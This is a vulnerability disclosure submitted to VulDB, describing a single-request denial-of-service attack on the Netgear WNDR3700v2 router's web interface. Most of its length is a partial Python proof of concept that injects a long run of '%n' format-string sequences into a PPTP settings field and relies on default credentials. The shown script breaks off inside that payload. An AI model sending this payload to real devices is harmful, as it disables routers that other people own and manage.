Submit #87904: DoS attack on the web management interface of Netgear router WNDR3700v2info

Title	DoS attack on the web management interface of Netgear router WNDR3700v2
Description	# DoS attack on the web triggered by only one request ## Overview of the Vulnerability There exists a DoS attack on the web management interface of Netgear router WNDR3700v2(referring to: https://www.netgear.com/support/product/WNDR3700v2.aspx,latest firmware version:x.x.x.x), which is triggered by only one crafted request. After the attack, the web server crashed for about 1 minute, so cannot respond to any visit. This DoS attack is easily performed and causes a critical impact on the router device. Only just one malformed request can disable the router's web service. ## Business Impact Application-level DoS can result in indirect financial loss for the business through the attacker’s ability to DoS the application. These malicious actions could also result in reputational damage for the business through the impact on customers’ trust. ## Steps to Reproduce I have put the POC code in the next section(save the code into poc.py), configure several parameters, then execute the POC, and the web management service will be damaged. The parameters are as below: 1. username, password: to visit the device's web interface (default: admin, password). 2. device_web_ip: web IP address of the target device. After executing the POC script, then trying to visit the router web management interface(or 'telnet device_web_ip 80'), you will find web service goes down. ## Proof of Concept (POC) ``` import requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'password' device_web_ip = '192.168.1.1' request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://127.0.0.1:8081', #'Authorization': 'Basic YWRtaW46cGFzc3dvcmQ=', 'Connection': 'keep-alive', 'Referer': 'http://127.0.0.1:8081/BAS_pptp.htm', 'Upgrade-Insecure-Requests': '1' }, 'PARAM': {'submit_flag': 'pptp', 'change_wan_type': 0, 'run_test': 'no', 'pptp_myip': '192.168.55.5', 'pptp_gateway': '192.168.55.6', 'pptp_subnet': 'x.x.x.x', 'pptp_dnsaddr1': '192.168.55.1', 'pptp_dnsaddr2': '192.168.55.2', 'hidden_pptp_idle_time': 5, 'conflict_wanlan': '', 'hid_mtu_value': 1436, 'hid_pptp_dod': 1, 'login_type': 'PPTP"%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n""%n"
User	leetsun (UID 39457)
Submission	02/12/2023 02:06 (3 years ago)
Moderation	02/15/2023 22:45 (4 days later)
Status	Accepted
VulDB entry	221153 [Netgear WNDR3700v2 1.0.1.14 Web Interface denial of service]
Points	17

◂ Previous Overview Next ▸

Might our Artificial Intelligence support you?

Check our Alexa App!